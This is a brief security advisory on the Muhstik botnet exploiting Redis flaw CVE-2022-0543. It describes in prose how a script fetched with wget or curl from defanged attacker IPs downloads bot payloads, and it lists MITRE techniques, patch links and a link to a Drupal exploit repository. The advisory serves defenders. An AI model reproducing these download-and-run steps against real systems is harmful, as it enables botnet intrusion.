Muhstik botnet adds another vulnerability exploit to its arsenal

THREAT LEVEL: Red. For a detailed advisory, download the pdf file here Muhstik malware has begun attacking Redis Servers by exploiting a recently reported vulnerability, CVE-2022-0543. This flaw can be found in several Redis Debian packages. The attack began on March 11, 2022, and was carried out by a threat actor who targeted Confluence servers in September 2021 and Log4j in December. The payload is a Muhstik bot variation that may be used to perform DDOS assaults. The threat actor first executes the Lua scripts to exploit the vulnerability found in Redis Debian servers. The threat actor attempts to download "Russia.sh" from "106[.]246.224.219" using wget or curl. It stores it as "/tmp/russ" and runs it which will download and run Linux payload from 160[.]16.58.163. These binaries have been recognized as Muhstik bot variants. This botnet then connects to an IRC server to receive commands that download files, run shell commands, and carry out attacks like flood attacks and SSH brute force attacks. The Mitre TTPs commonly used by Muhstik malware are: TA0001: Initial Access TA0011: Command and Control TA0042: Resource Development TA0008: Lateral Movement T1071: Application Layer Protocol T1588.006: Obtain Capabilities: Vulnerabilities T1190: Exploit Public-Facing Application T1021.004: Remote Services: SSH T1059.004: Command and Scripting Interpreter: Unix Shell Vulnerability Details Indicators of Compromise (IoCs) Patch Links http://www.oracle.com/technetwork/security-advisory/cpuoct2017-3236626.html https://security-tracker.debian.org/tracker/CVE-2022-0543 http://www.oracle.com/technetwork/security-advisory/alert-cve-2019-2725-5466295.html https://github.com/g0rx/CVE-2018-7600-Drupal-RCE https://jira.atlassian.com/browse/CONFSERVER-67940 https://logging.apache.org/log4j/2.x/manual/migration.html References https://blogs.juniper.net/en-us/security/muhstik-gang-targets-redis-servers